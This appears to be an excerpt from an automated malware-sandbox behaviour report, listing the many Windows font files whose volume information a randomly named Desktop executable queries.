Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
